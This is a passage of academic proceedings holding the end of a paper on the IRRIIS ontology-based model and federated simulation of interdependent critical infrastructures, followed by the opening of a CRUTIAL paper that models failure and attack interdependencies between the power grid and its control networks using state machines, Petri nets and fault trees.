These are the main goals of the IRRIIS project. The modelling and simulation approach taken in this project to deal with CI dependencies will be outlined in this paper. The paper is organized as follows: in Chapter 2 we motivate and describe our modelling approach to CI dependencies. How the IRRIIS models are used for the simulation of critical infrastructures will be explained in more detail in Chapter 3. In Chapter 4 we summarize our results and give an outlook on future research.
2 The IRRIIS Information Model
Today, the management and control of critical infrastructures depend to a large extent on information and communication technologies (ICT). They provide the "nerve systems" of these large infrastructures. There are highly sophisticated software systems allowing the stakeholders to manage, control, and analyse their
systems under more or less every condition. What is frequently missing today is information related to dependencies on other systems: geographic neighbourhood information, physical or information and control dependencies, etc. The information systems used to model the critical infrastructures tend to be very different. There is no common modelling approach. They are quite different for different domains, but even within the same domain different information modelling and processing approaches are used. This is quite natural considering the many different kinds of information and the various approaches and algorithms used for these purposes. Critical infrastructures are physical systems or are based on such systems. Electrical power networks, traffic systems, or telecommunication systems exist in the physical world, they behave according to the laws of physics, and they interact with their physical environment. They process information about their state, and they may also exchange information with other systems in order to manage their dependencies. The dependency analysis of critical infrastructures has to take both dimensions and their mutual interactions into account: the physical and the information and communication aspect. Consequently, a key issue is to establish information models and simulation techniques which take exactly these issues into consideration: the components and systems, their behaviours, events, actions of control, risks, etc. This will help to manage critical infrastructures more effectively and efficiently, and it will improve information interchange between those information systems dealing with the control of different critical infrastructures. The main point is to bring all dependency-related information together with all other kinds of information necessary to manage and control the various kinds of critical infrastructures. We need an information model which is

– as general as necessary in order to represent the commonalities of critical infrastructures for dependency analysis independent of their concrete type,
– sufficiently expressive in order to represent the many different kinds of related information, and
– well defined, with clear semantics, in order to be manageable by the different kinds of information systems working with it.

Following established semantic modelling techniques [4], we build the IRRIIS Information Model as an ontology [11] of Critical Infrastructures. In order to be as general as necessary and at the same time as adaptive as needed for the different kinds of CI, the IRRIIS Information Model is built on three levels of generalization:

1. The Generic Information Model (GIM): the top-level ontology of Critical Infrastructures. It is based on the assumption that there is a common core information model for critical infrastructures and their dependencies. Whatever the CI to be modelled and its dependencies are, for the purpose of CI dependency analysis and management it will be described in terms of this IRRIIS Generic Information Model and its domain-specific extensions (see below). This common model provides the basis for communication between
different CIs. It provides a common, semantically well-defined vocabulary as a precondition for this communication. It captures the basic physical structure of the CI with its components and systems and their connections, their behaviours on an appropriate level of abstraction, the services they provide, and events, actions and associated risks. In this way it is sufficiently expressive to capture all dependency-related information.

2. The domain-specific information models: they adapt, specialize and extend the Generic Information Model according to the special needs of the various domains (like electrical power networks, traffic systems, or telecommunication nets). They contain the specific types of components and their behaviours as specializations of the more general concepts introduced in the GIM.

3. The instance-level models: this third layer describes the concrete critical infrastructures in terms of the respective domain-specific information model, as instantiations of the concepts and relations defined in this model.
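To make the three levels concrete, here is a minimal sketch in Python, under purely illustrative naming assumptions (none of the class or instance names below come from IRRIIS), of how a GIM concept, a domain-specific specialization and an instance-level element relate to each other:

```python
# Level 1 (GIM): generic concepts shared by all CIs.
class Component:
    """Generic CI component: provides and needs services (see Sect. 2.1)."""
    def __init__(self, name):
        self.name = name
        self.provides = []   # services offered to other components/systems
        self.needs = []      # services required to work correctly

# Level 2 (domain model): power-grid specialization of the generic concept.
class Transformer(Component):
    pass

# Level 2 (domain model): telecommunication specialization.
class Router(Component):
    pass

# Level 3 (instance model): a concrete element of a concrete infrastructure.
substation_transformer = Transformer("transformer-01")
substation_transformer.provides.append("power supply")
```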
2.1 The IRRIIS Generic Information Model
These three models are, of course, tightly related to each other – as will be shown in more detail now.

The Static Information Model. The Static Model is the basic ontology describing the main concepts, their relations and attributes (see Fig. 2) needed for CI modelling. (The UML diagrams are used only as illustrations of the model; UML does not provide the necessary semantic precision.) Components and systems describe the structure and topology of a CI. Components and systems can be described by a set of relevant attributes (not shown here). In the domain model more specific sub-classes of systems, components and attributes can be introduced.

Part structures. Systems have parts – described by the hasPart relation. Its terminal elements are components.

Connections. Systems and components are connected to other systems and components. (Because connections form a central element in typical CI models they are described by classes with attributes etc. – not just as relations.) There can be different types of connections, like physical and control connections, in the domain models (see below).

Services. Systems and components provide services to other systems/components, and systems and components need services in order to work correctly. This is a useful and attractive abstraction providing a lot of flexibility for modelling
Fig. 1. An overview of the three layers of the IRRIIS Generic Information Model: the static model, the behaviour model, and the event and action layer
– especially for the actions of systems and critical infrastructures. In parts of the model, or in the whole model, we may use services as the basic level of description – omitting the component layer.

Effects. Services may have effects. An effect is described as resulting in certain values for attributes of involved components or services (heating, cooling, ...). A connection may be used to mediate some services – this is one way in which actions of systems and components can be described in IRRIIS.

Dependencies. A connection causes a dependency. Due to the different types of connections there may be different types of dependency. Dependencies may be characterized in more detail by various attributes.

Geospatial attributes. Components, systems and events (see below) may be described by their geospatial locations. Locations and areas are related to each other through geospatial contained-in, neighbourhood, or distance relations.

Systems and services. Every service is provided by a system/component. In the same way, a system/component needs services in order to work correctly. The failure of any of these input services results in a failure of the component or system – with the consequence that the services normally provided by it will also fail. A service-oriented modelling is an adequate abstraction in those cases where a system or CI provides a service in different ways to other systems/CIs [3].

The IRRIIS Behaviour Model. The key elements in the IRRIIS behaviour model are states and transitions (Fig. 3).
Fig. 2. The core of the IRRIIS Static Model: components, systems, services and connections
States. Components/systems, services, and connections can have states. An entity is in a certain state either if this is explicitly given (like 'broken' or 'switched-off') or if the criteria defining this state are fulfilled by the entity (see below). The states are defined according to the respective entity type, i.e., components of a certain type can have different states than other component types or services. Which states are defined depends on the application – the IRRIIS model deliberately does not impose any restrictions here. All we need is a finite set of states.

States and services. The state of a service is determined by the state of the component or system which provides this service. The state of a component or system depends on the state of the services it needs.

Transitions. States (as discrete entities) are related to each other via transitions. States and transitions together form finite state machines for the entities they apply to. The transitions do not have to be deterministic – i.e., we may have probabilistic state machines. We may also assign temporal aspects to such transitions (duration, delay, etc.).

Propagation of state transitions. The state of a system/component depends on the states of the services it needs or on the states of other components/systems it depends on. If one of those states changes, this transition will be propagated to the depending systems/components.

Temporal aspects. State transitions are not necessarily instantaneous. They can occur with a certain delay. An overloaded power transmission line will withstand this
Fig. 3. The IRRIIS Behaviour Model with states and transitions
overload for a while (depending on the amount of overload); only then will it break.

States and attributes. The states of a component, system, or service can be related to its physical attributes: in order to be in the normal operational state, a system for instance has to fulfil some constraints on its attributes. In this way states can be classified according to attribute values using classification constraints. These constraints are part of the domain model and are applied to each instance. States may also be changed directly by events or actions – without explicit reference to physical attributes. For instance, a system's state may change when the state of one of its components changes. Or we simply say that a component is broken without saying why and in which way.

The definition of states is a key issue in an IRRIIS model. It may be adequate for an IRRIIS application just to discriminate between two states like "working" and "out of work". In other cases we may need much more fine-grained states (and transitions between them). For instance, a system may still provide the services it is responsible for, but with the restriction that some of its sub-systems do not work at the moment and that the built-in redundancy or emergency systems have already taken over responsibility for these services (resulting in a higher risk of failure).
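The following sketch (ours, not IRRIIS code; the state names and the delay rate are illustrative assumptions) shows the behaviour-model ingredients just described: a finite set of states per entity, propagation of a transition along the dependency network, and a non-instantaneous transition:

```python
import random

class Entity:
    """An entity (component, system or service) with a finite set of states."""
    def __init__(self, name, state="working"):
        self.name, self.state = name, state
        self.dependents = []  # entities that need a service this one provides

    def set_state(self, new_state, delay=0.0):
        # 'delay' models a non-instantaneous transition, e.g. an overloaded
        # line that withstands the overload for a while before breaking
        print(f"+{delay:.2f} h  {self.name}: {self.state} -> {new_state}")
        self.state = new_state
        if new_state == "out of work":
            # propagation: the failure of a needed service fails the dependent
            for d in self.dependents:
                d.set_state("out of work")

line = Entity("transmission line")
scada = Entity("SCADA server")          # needs power delivered via the line
line.dependents.append(scada)
line.set_state("out of work", delay=random.expovariate(0.5))
```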
2.2 The IRRIIS Events and Actions Model
The IRRIIS Generic Information Model contains the concepts needed to describe scenarios, events, actions, etc. – and how these concepts are related to the other main information categories.

Events. Events trigger state transitions. They are either external or internal events. An external event is something happening outside of the respective system or component that changes its state. An internal event is a state transition within one of the parts of a system.
Actions. Actions are like events but performed deliberately by a certain agent in order to achieve a certain state change in a certain system/component.

Scenarios. A scenario is a sequence of events and actions. They are ordered by time, and the events and actions in a scenario may be related to each other by causal relations. They can also be independent of each other (just happening by accident) – thus allowing us to model a large variety of different types of scenarios and to analyze in which way they affect the dependent critical infrastructures. Scenarios may contain events coming from outside, and events resulting from the evolution of the system. Actions are similar to events – with the exception that they are executed deliberately as a reaction to a certain state, pursuing a certain goal (a state to be reached) and following a certain strategy or policy.

Temporal aspects. Events and actions can be described in their temporal aspects: when they occur, whether they are instantaneous or have a duration, etc.
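As a small illustration (our own encoding, with invented component names and times), a scenario can be represented simply as a time-ordered list of event and action records:

```python
# Events happen; actions are performed deliberately by an agent, pursuing a
# goal. Causal relations could be added as references between records.
scenario = [
    {"t": 0.0,  "kind": "event",  "target": "power supply",   "to": "broken"},
    {"t": 4.5,  "kind": "event",  "target": "telecom router", "to": "out of work"},
    {"t": 10.0, "kind": "action", "agent": "operator",
     "target": "backup generator", "to": "on"},
]
for record in sorted(scenario, key=lambda r: r["t"]):
    print(record)
```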
2.3 The IRRIIS Domain Models and Instance Models
The IRRIIS Generic Information Model, as the top-level CI ontology, contains the main concepts and relations for modelling large Critical Infrastructures and their dependencies. It provides the basis for the concrete domain models, which contain those concepts and relations needed to model domains like electrical power grids or telecommunication networks. These concrete domain concepts and their relations are specializations of the generic concepts defined in the GIM. For instance, in the electrical power grid domain we may have concepts like power station, transformer, and consumer as special categories under the general concept "component/system", or we may have special relations like 'controls' as specializations of the general connection concept in the GIM. The IRRIIS domain models will then be instantiated in order to model concrete systems like the ACEA electrical power network in Rome or the Telecom Italia communication network in central Italy.
3 The Simulation of Dependent Critical Infrastructures

3.1 The IRRIIS Simulation Environment SimCIP
In the previous chapter we outlined the IRRIIS Information Model. Now we will explain in which way these models will be used. There are mainly two ways to deal with CI dependency: the management of real critical infrastructures or the simulation of such CIs and their dependencies. The simulation approach will need a simulation environment which allows us to simulate the behaviour of the systems to the necessary granularity and
Fig. 4. Parts of the instance level models of the simulated networks and their dependencies
precision. In IRRIIS, the simulation environment SimCIP has been developed for this purpose. It is built on our agent-based simulation system LampSys, which provides important features for CI simulation like encapsulation, modularity, states and transitions, quite different temporal behaviours, and rule-based propagation of state transitions along dependency networks. SimCIP can be connected through a generic simulation interface to other external simulators for federated simulation (see the next chapter).
3.2 Federated Simulation
Obviously, critical infrastructures can be quite different and behave in quite different ways. A broad range of highly sophisticated techniques is used to simulate such diverse systems – depending on the type of the systems, their behaviours, and the purposes of the simulation. Typically these simulations do not consider dependencies between systems. This is exactly where the IRRIIS Information Model and its usage come into play.

The IRRIIS approach can be characterized as a federated simulation approach: SimCIP takes the simulations of each critical infrastructure and integrates them – in this way taking the dependencies between them into account. The IRRIIS Information Model provides the information "glue" for the federated simulation. SimCIP allows us to relate the results from the simulation of one CI in a standardized way to the simulation results of another, depending CI by mapping all native simulation results to the unifying IRRIIS Information Model.
Fig. 5. Federated simulation in IRRIIS: the simulation tool SimCIP using the IRRIIS Information Model for information integration and native simulation tools for Critical Infrastructures
Though the critical infrastructures are different, they communicate with each other through the exchange of information about state transitions and events. This information is formulated in the IRRIIS Information Model, allowing each CI to interpret the information it receives from other CIs. The simulation of the system behaviour of the involved critical infrastructures is combined (or federated) into an overall simulation of dependent critical infrastructures by using the native simulations of each CI and the state transition and event chain mechanism of the IRRIIS simulation. Two points should be highlighted here:

– The expressive information model of IRRIIS allows us to represent all relevant information (systems, components, their part structure and dependencies, their behaviours, etc.) in an expressive, adequate and transparent way.
– The classification of the behaviour results from each CI simulation in terms of states, state transitions, and events is the main "interface" between the native CI simulations and the IRRIIS dependency simulation.

In our example, federated simulation by SimCIP works as follows:

1. An event in the power network changes the state of the component "power supply" from 'on' to 'broken'.
2. This state transition is propagated by SimCIP to the native power network simulator.
3. This simulator calculates the new power distribution of the power network.
4. The results are taken by SimCIP and used for state classification on the power network.
5. Every state change of a component/subsystem in the power network which has a dependency relation to a component in one of the other networks is propagated by SimCIP to this depending component.
6. The state transition of this component is now propagated by SimCIP to the native simulator of this network.

This propagation can stop after a while in a new stable state (for instance, if sufficient redundancy of a network prevents an outage), it can result in a cascade and outage, or appropriate measures may be taken to stop the propagation. The main point here is that SimCIP integrates the native simulations of the respective critical infrastructures through the common IRRIIS Information Model.
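A minimal sketch of this six-step loop (our illustration of the mechanism, not SimCIP code; the component names, the stub simulator and the dependency table are assumptions) might look as follows:

```python
class NativePowerSim:
    """Stub for the native power network simulator (steps 2-3)."""
    def recompute(self, grid_state):
        grid_state["distribution"] = "recomputed"
        return grid_state

def classify(grid_state):
    """Step 4: map native simulation results to IRRIIS states."""
    return {"power supply": "broken", "feeder-7": "out of work"}

# Cross-CI dependency relations expressed in the common information model.
dependencies = {"feeder-7": ["telco-node-3"]}

def federated_step(event, grid_state, power_sim):
    grid_state[event["component"]] = event["to"]        # step 1
    grid_state = power_sim.recompute(grid_state)        # steps 2-3
    for comp, state in classify(grid_state).items():    # step 4
        for dep in dependencies.get(comp, []):          # step 5
            # step 6: hand the transition to the native simulator of the
            # depending CI (printed here instead)
            print(f"propagate {comp}={state} -> {dep}")

federated_step({"component": "power supply", "to": "broken"},
               {}, NativePowerSim())
```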
4 Summary and Outlook
The IRRIIS Information Model introduced here provides the basis for information modelling and simulation for CI dependency analysis and management. It is formulated as an ontology providing an expressive framework with clear semantics for the different kinds of information required. As a lingua franca of dependencies, it provides the communication platform for exchanging dependency-related information between different critical infrastructures, even from different sectors and domains.

The model introduced here is a first approach which will be further elaborated. In particular, we plan to gather more experience regarding the expressiveness of the IRRIIS Information Model and the required granularity of the domain models (which states, which dependencies, how to model risks, etc.). At the moment, event and action chains are specified manually by domain experts. A logical next step is to generate such event-action chains automatically in a systematic way. This will allow us to analyse dependencies more comprehensively and systematically.
Acknowledgement. The research described in this paper was partly funded by the EU Commission within the 6th IST Framework in the IRRIIS Integrated Project under contract No. 027568. The authors thank all project partners for many interesting discussions which greatly helped to formulate the approach described here.
References

1. The IRRIIS European Integrated Project, http://www.irriis.org
2. Pederson, P., et al.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research. Technical Report, Idaho National Lab (August 2006)
3. Beyer, U., Flentge, F.: Towards a Holistic Metamodel for Systems of Critical Infrastructures. In: ECN CIIP Newsletter (October/November 2006)
4. Staab, S., Studer, R. (eds.): Handbook on Ontologies. International Handbooks on Information Systems. Springer, Heidelberg (2004)
5. Bernardi, S., Merseguer, J.: A UML Profile for Dependability Analysis of Real-Time Embedded Systems. In: Proc. WOSP 2007, Buenos Aires, Argentina (February 2007)
6. Annoni, A.: Orchestra: Developing a Unified Open Architecture for Risk Management Applications. In: van Oosterom, P., et al. (eds.) Geo-information for Disaster Management. Springer, Heidelberg (2005)
7. Schmitz, W., et al.: Interdependency Taxonomy and Interdependency Approaches. The IRRIIS Consortium, Deliverable D.2.2.1 (June 2007)
8. Alexiev, V., et al.: Information Integration with Ontologies. Wiley, Sussex (2005)
9. Rathnam, T.: Using Ontologies To Support Interoperability In Federated Simulation. M.Sc. thesis, Georgia Institute of Technology, Atlanta, GA, USA (August 2004)
10. Borst, W.: Construction of Engineering Ontologies. Centre for Telematics and Information Technology, University of Twente, Enschede, The Netherlands (1997)
11. Gruber, T.: Toward Principles for the Design of Ontologies Used for Knowledge Sharing. In: Proceedings of the International Workshop on Formal Ontology, Padova, Italy (1993)
12. Cerotti, D., Codetta-Raiteri, D., Donatelli, S., Dondossola, G., Garrone, F.: Representing the CRUTIAL project domain by means of UML diagrams. In: Proc. CRITIS 2007, Malaga, Spain (October 2007)
13. Kröger, W.: Reliability Engineering and System Safety. Reliability Engineering and System Safety 93, 1781–1787 (2008)
14. Min, H.J., Beyeler, W., Brown, T., Son, Y.J., Jones, A.T.: Toward modeling and simulation of national CI interdependencies. IIE Transactions 39, 57–71 (2007)
15. Hopkinson, K., Wang, X., Giovanini, R., Thorp, J., Birman, K., Coury, D.: EPOCHS: A Platform for Agent-Based Electric Power and Communication Simulation Built from Commercial Off-The-Shelf Components. IEEE Transactions on Power Systems 21(2), 548–559 (2006)
Multi-level Dependability Modeling of Interdependencies between the Electricity and Information Infrastructures

Marco Beccuti¹, Giuliana Franceschinis¹, Mohamed Kaâniche², and Karama Kanoun²

¹ Dip. di Informatica, Univ. del Piemonte Orientale, 15100 Alessandria, Italy
{beccuti,giuliana}@mfn.unipmn.it
² LAAS-CNRS, Univ. de Toulouse, F-31077 Toulouse, France
{mohamed.kaaniche,karama.kanoun}@laas.fr
Abstract. The interdependencies between infrastructures may be the cause of serious problems in mission/safety critical systems. In the CRUTIAL¹ project, the interdependencies between the electricity infrastructure (EI) and the information infrastructure (II) responsible for its control, maintenance and management have been thoroughly studied; moreover, countermeasures to substantially reduce the risk of service interruption have been developed in the project. The possible interdependencies have been investigated by means of models at different abstraction levels. In this paper, we present high-level models describing the various interdependencies between the EI and the II infrastructures; we then illustrate on a simple scenario how these models can be detailed to allow the evaluation of some measures of dependability.
1 Introduction
There is a wide consensus that developing modeling frameworks for understanding interdependencies among critical infrastructures and analyzing their impact is a necessary step for building interconnected infrastructures on which a justified level of confidence can be placed with respect to their robustness to potential vulnerabilities and disruptions. Modeling can provide useful insights into how component failures might propagate and lead to cascading or escalating failures in interdependent infrastructures, and it can assess the impact of these failures on the service delivered to the users. In the context of CRUTIAL, we focus on two interdependent infrastructures: the electric power infrastructure (EI) and the information infrastructure (II) supporting management, business, control and maintenance functionality. As discussed in [3], there has been extensive work on the modeling of individual infrastructures, and various methods and tools have been developed to predict the consequences of potential disruptions within an individual infrastructure.

¹ CRUTIAL (Critical Utility Infrastructure resilience), FP6 European Project (http://crutial.cesiricerca.it)
However, the modeling and evaluation of interdependent infrastructures is still at an exploratory stage. The modeling activities carried out in CRUTIAL aim at contributing to fill this gap, taking into account in particular: a) the three types of failures that are characteristic of interdependent infrastructures [6] (cascading², escalating³, and common-cause failures), b) the various classes of faults that can occur, including accidental as well as malicious threats, and c) the temporal and structural characteristics of the power and information infrastructures investigated.

A major challenge lies in the complexity of the modeled infrastructures in terms of largeness, multiplicity of interactions and types of interdependencies involved. To address this problem, a number of abstractions and appropriate approaches for the composition of models are necessary. In CRUTIAL, the interdependencies have been analyzed at different levels: from a very abstract view expressing the essence of the typical phenomena due to the presence of interdependencies, to an intermediate detail level representing in a rather abstract way the structure of the system (in some scenarios of interest), to a quite detailed level where the system components and their interactions are modeled in a fairly realistic way and simulation is used to derive interesting reliability measures.

In this paper a two-level modeling approach is proposed and illustrated through a simple scenario inspired by the CRUTIAL project. This is part of a multi-level and multi-formalism approach to the qualitative and quantitative study of the interdependencies between the EI and the II controlling and managing it. In Section 2, the highest abstraction level is considered, showing the sequences of (abstract) events leading to typical interdependency phenomena such as cascading and escalation. In Section 3, a (simple) scenario is used to illustrate a more refined, second-level representation, from which quantitative information can be provided to enable performance/reliability analysis. We will show how the higher-level models can be composed with the more refined one and used to highlight possible instantiations of the abstract interdependency phenomena. Section 4 concludes the paper.
2 High-Level Abstract Models of Interdependencies
This section summarizes the high-level abstract models presented in [5]. We model the EI and II behavior globally, taking into account the impact of failures in the infrastructures and their effects on both infrastructures, without explicitly taking into account their underlying implementation structure. For the sake of clarity, events and states of the II are prefixed by i- while those of the EI are prefixed by e-. We first address accidental failures in the II, then malicious attacks.
² Cascading failures occur when a failure in one infrastructure causes the failure of one or more component(s) in a second infrastructure.
³ Escalating failures occur when an existing failure in one infrastructure exacerbates an independent failure in another infrastructure, increasing its severity or the time for recovery and restoration from this failure.
2.1 Accidental Failure Model
The model, given in Fig. 1, is based on assumptions related to the behavior of the infrastructures as resulting from their failures and mutual interdependencies. These assumptions are summarized before commenting on the model.

Impact of i-failures. Accidental i-failures affecting the II can be either masked (unsignaled) i-failures, leading to latent errors, or signaled. Latent errors can be either passive (i.e., without any action on the EI, but keeping the operators uninformed of possible disruptions occurring in the EI) or active (provoking undue configuration changes in the EI). After signaled i-failures, the II is in a partial i-outage state. Latent errors can accumulate. Signaled i-failures may take place when the II is in latent error states. When the II is in a partial i-outage state, i-restoration is necessary to bring it back to an i-working state.

We assume that an i-failure puts some constraints on the EI (i.e., a cascading failure), leading to a weakened EI (e.g., with lower performance, undue isolations, or unnecessary off-line trips of production plants or of transmission lines). From an e-weakened state after a signaled i-failure, an e-configuration restoration leads the EI back into a working state, because no e-failures occurred in the EI. Accumulation of untimely configuration changes may lead to the e-lost state (i.e., a blackout state), from which an e-restoration is required to bring the EI back into an e-working state. The above events and the resulting states are recapitulated in Table 1.
Fig. 1. Model of the two infrastructures when considering accidental failures
Table 1. States and events of the information infrastructure (II)

Events:
– Signaled i-failure: detected i-failure.
– Masked i-failure: undetected i-failure.
– i-restoration: action for bringing the II back to its normal functioning after i-failure(s).

States:
– i-working: the II ensures normal control of the EI.
– Passive latent error: parts of the II have an i-failure, which prevents monitoring of the EI: e-failures may remain unnoticed.
– Active latent error: parts of the II have an i-failure that may lead to unnecessary, and unnoticed, configuration changes.
– Partial i-outage: parts of the II knowingly have an i-failure. Partial i-outage is assumed: the variety of functions and components of the infrastructure, and its essential character of a large network, make a total outage unlikely.
– i-weakened: parts of the II can no longer implement their functions, although they do not have an i-failure, due to constraints originating from e-failures (e.g., shortage of electricity supply of unprotected parts).
Table 2. States and events of the electricity infrastructure (EI)

Events:
– e-failure: malfunctioning of elements of the power grid: production plants, transformers, transmission lines, breakers, etc.
– e-restoration: actions for bringing the EI back to its normal functioning after e-failure(s) occurred. Typically, e-restoration is a sequence of configuration change(s), repair(s), and configuration restoration(s).
– e-configuration change: change of configuration of the power grid that is not an immediate consequence of e-failures, e.g., off-line trips of production plants or of transmission lines.
– e-configuration restoration: act of bringing the EI back to its initial configuration, when configuration changes have taken place.

States:
– e-working: electricity production, transmission and distribution are ensured in normal conditions.
– Partial e-outage: due to e-failure(s), electricity production, transmission and distribution are no longer ensured in normal conditions; they are however somehow ensured, in degraded conditions.
– e-lost: propagation of e-failures within the EI led to losing its control, i.e., a blackout occurred.
– e-weakened: electricity production, transmission and distribution are no longer ensured in normal conditions, due to i-failure(s) of the II that constrain the functioning of the EI, although no e-failure occurred in the latter. The capability of the EI is degraded: lower performance, configuration changes, possible manual control, etc.
Impact of e-failures. We consider that the occurrence of e-failures leads the EI to be in a partial e-outage state, unless propagation within the infrastructure leads to losing its control (e.g., a blackout of the power grid) because of an i-failure
(this latter case corresponds to escalating events). E-failures may also lead the II to an i-weakened state in which parts of the II can no longer implement their functions, although they are not failed, due to constraints originating from the failure of the EI. The above events and states are recapitulated in Table 2.
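To fix ideas, the following fragment (our encoding; it covers only a few of the transitions described above) expresses part of the Fig. 1 model as transition tables over the events and states of Tables 1 and 2:

```python
II_TRANSITIONS = {
    ("i-working", "masked i-failure (passive)"): "passive latent error",
    ("i-working", "masked i-failure (active)"):  "active latent error",
    ("i-working", "signaled i-failure"):         "partial i-outage",
    ("partial i-outage", "i-restoration"):       "i-working",
}
EI_TRANSITIONS = {
    # cascading: a signaled i-failure puts constraints on the EI
    ("e-working", "signaled i-failure"):            "e-weakened",
    ("e-weakened", "e-configuration restoration"):  "e-working",
    ("e-weakened", "accumulated e-config changes"): "e-lost",
    ("e-lost", "e-restoration"):                    "e-working",
}

ii, ei = "i-working", "e-working"
event = "signaled i-failure"
ii, ei = II_TRANSITIONS[(ii, event)], EI_TRANSITIONS[(ei, event)]
print(ii, "/", ei)   # partial i-outage / e-weakened
```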
2.2 Malicious Attacks Model
Attacks fall into two classes: deceptive attacks, provoking unperceived malfunctions, thus similar to the latent errors previously considered, and perceptible attacks, creating detected damage. Deceptive attacks can be passive (i.e., without any direct action of the II on the EI) or active, provoking configuration changes in the EI by the II. Fig. 2 gives the state machine model of the infrastructures. Due to the very nature of attacks, a distinction has to be made for both infrastructures between their real status and their apparent status. For the EI, the apparent status is as reported by the II. The models of Figs. 1 and 2 are very similar: they differ in the semantics of the states and of the inter-state transitions.

In state 2, the effects of the passive deceptive attack are: i) the II looks like it is working while it is in a partial i-outage state due to the attack; ii) it does not perform any action on the EI, but wrongly informs the operator that the EI is in partial e-outage; and, as a consequence, iii) the operator performs some configuration changes in the EI, leading it to an e-weakened state. Accumulation of configuration changes by the operator may lead the EI into the e-lost state.
Fig. 2. Model of the two infrastructures when considering malicious attacks
In state 3, the effects of the active deceptive attack are: i) the II looks like it is working while it is in a partial i-outage state due to the attack; ii) it performs some configuration changes in the EI, leading it to an e-weakened state without informing the operator, for whom the EI appears as if it were working. Accumulation of configuration changes by the II may lead the EI into an e-lost state. The difference between states 2 and 3 is that in state 2 the operator has performed some actions on the EI, while in state 3 the operator is not aware of the actions performed by the II on the EI.

After detection of the attack, the apparent states of the infrastructures become identical to the real ones (state 4), in which i-restoration and e-configuration restoration are necessary to bring the infrastructures back to their working states. States 5, 6 and 7 are very similar to states 5, 6 and 7 of Fig. 1, respectively, except that in state 6 the II is in a partial i-outage state following a perceptible attack in Fig. 2 and following a signaled i-failure in Fig. 1. State 8 corresponds to the e-lost state, but the operator is not aware of it: he has been wrongly informed, by the II in partial i-outage, that the EI is in a partial e-outage state.
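The real/apparent distinction can be captured directly in a detailed model; a minimal sketch (ours, with the field values taken from the description of state 2 above):

```python
from dataclasses import dataclass

@dataclass
class InfraStatus:
    real: str
    apparent: str   # for the EI, the apparent status is as reported by the II

def passive_deceptive_attack(ii: InfraStatus, ei: InfraStatus):
    # state 2: the II looks like it is working while in partial i-outage ...
    ii.real, ii.apparent = "partial i-outage", "i-working"
    # ... it wrongly reports a partial e-outage, so the operator performs
    # undue configuration changes, leading the EI to an e-weakened state
    ei.apparent, ei.real = "partial e-outage", "e-weakened"

ii = InfraStatus("i-working", "i-working")
ei = InfraStatus("e-working", "e-working")
passive_deceptive_attack(ii, ei)
print(ii, ei)
```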
2.3 Global Conceptual Model
The global abstract model, taking into account both accidental failures and malicious attacks, results from the superposition of the two models. A unified model is presented in [4]; in this paper we have presented the separate models for the sake of simplicity. Our aim is to illustrate how to join the abstract modeling level to detailed models allowing dependability quantification.
3 Detailed Models of Scenarios
The high-level abstract models show typical failure scenarios and the combined states of the infrastructures as resulting from their interdependencies. The evaluation of quantitative dependability measures based on these models requires the specification of the probability distributions associated with the transitions of the abstract models. As these transitions result from the occurrence of several elementary events affecting the components of the infrastructures, the development of more detailed models highlighting these events and taking into account the internal behavior of the infrastructures should help to identify representative probability distributions.

The states in Figs. 1 and 2 are in reality macro-states gathering a set of elementary states of the infrastructures in which the service delivered is equivalent. Let us, for example, consider the transition from state 1 to state 4 in Fig. 1. This transition takes place only when the accumulation of elementary events results in a significant degradation of the service delivered by the EI, leading it to an "e-weakened state". Quantification of dependability measures requires modeling the underlying system's behavior. A measure of dependability could be, for example, the distribution of the time to reach state 4 from state 1, either directly or through states
2 and 3, i.e., the distribution of the time to a signaled failure (Fig. 1), or the distribution of the time to a perceptible attack (Fig. 2). In this section, we show a simple example of a detailed model allowing the evaluation of this distribution. We will describe the underlying system and its associated models and show the relationship between the detailed and the high-level abstract model.
3.1 A More Detailed Model of a Simple Scenario
The system considered is described in [2] and illustrated in Fig. 3. It represents the teleoperation function performed between a Control Centre (CC) and a SubStation (SS) by means of a communication network. We suppose that the communication between the sites is performed in the following way: the CC sends requests to the SS to obtain the execution of a command by the SS (e.g., arming), or to retrieve data from the SS (signals, measures, etc.). The SS replies to the CC by acknowledging the command execution, or by sending the required data. Each communication needs a minimum level of available bandwidth to be completed. In this context we consider two types of i-failures, bringing the system from state 1 to state 4 of the models of Figs. 1 and 2, respectively:

1. A signaled i-failure of the CC, which can occur in the two following cases: the TELECONTROL devices (ATS or ATS Web Server) are not available, or the communication inside the CC is not available due to the failure of the internal network (LAN, Firewall or Router).
2. A perceptible denial of service (DoS) attack on the communication network. Such an attack consists of sending a high number of packets on the communication network, with the effect of reducing the available bandwidth and causing excessive delay or loss of packets between the CC and the SS. A DoS attack may last for a random period of time, and it may be blocked by the success of a countermeasure (firewalling, traffic monitoring, etc.).
Fig. 3. Architecture of the EI and II considered for the example
3.2 Description of the Model
For modeling the above scenario we use a multi-formalism approach combining the Stochastic Well-formed Net (SWN) [1] and Fault Tree (FT) [7] formalisms. In particular, the multi-formalism model is composed of two submodels: an SWN model and an FT model. The first (Fig. 4) represents the exchange of requests and replies between the CC and the SS by means of the communication network, and the possibility of the occurrence of a DoS attack on the same network. The second, an FT model (Fig. 5), represents the failure mode of the CC.

The SWN is a High-Level Stochastic Petri Net formalism. Places (circles) containing tokens (which in HLPNs can carry information) represent the state, while transitions (boxes) represent state changes whose preconditions and effects are represented by arcs. Transition firing times are random variables. The fact that tokens can carry information makes the model parametric: e.g., each message can have a distinct identifier; moreover, the model can be easily extended to represent several SSs. Finally, SWN models can be studied through very efficient analysis techniques exploiting the presence of symmetries in the model.

SWN model description. The SWN model is shown in Fig. 4, where the dashed boxes represent the CC, the SS and the attacker, respectively. The transition CC_send models the generation of a request to be sent to the SS, by putting a token inside the place CC_buffer_out and inside the place Commands, describing the requests to be sent on the network and the requests waiting for a reply, respectively. The bandwidth is modeled by a set of tokens inside the place Bandwidth; each time a request has to be sent (a token is present in CC_buffer_out), the marking of Bandwidth is reduced by one to model the reduction of bandwidth due to the transmission (transition CC_transmit). When the transition CC_transmit fires, the token representing the request is moved from the place CC_out to the place SS_buffer_in, in order to model the receipt of the request by the SS. Moreover, the firing of CC_transmit determines the increase of the marking of the place Bandwidth, in order to model the fact that more bandwidth is now available.

The requests to be processed by the SS are represented by tokens inside the place SS_buffer_in. The processing is modeled by the transition process. The replies are represented by tokens put inside the place SS_buffer_out; their transmission is represented by the transition SS_transmit; as in the case of the requests, the transmission of replies determines a temporary decrease of the marking of the place Bandwidth. Once the reply is received by the CC (token inside the place CC_buffer_in), the corresponding pending request is removed from the place Commands.

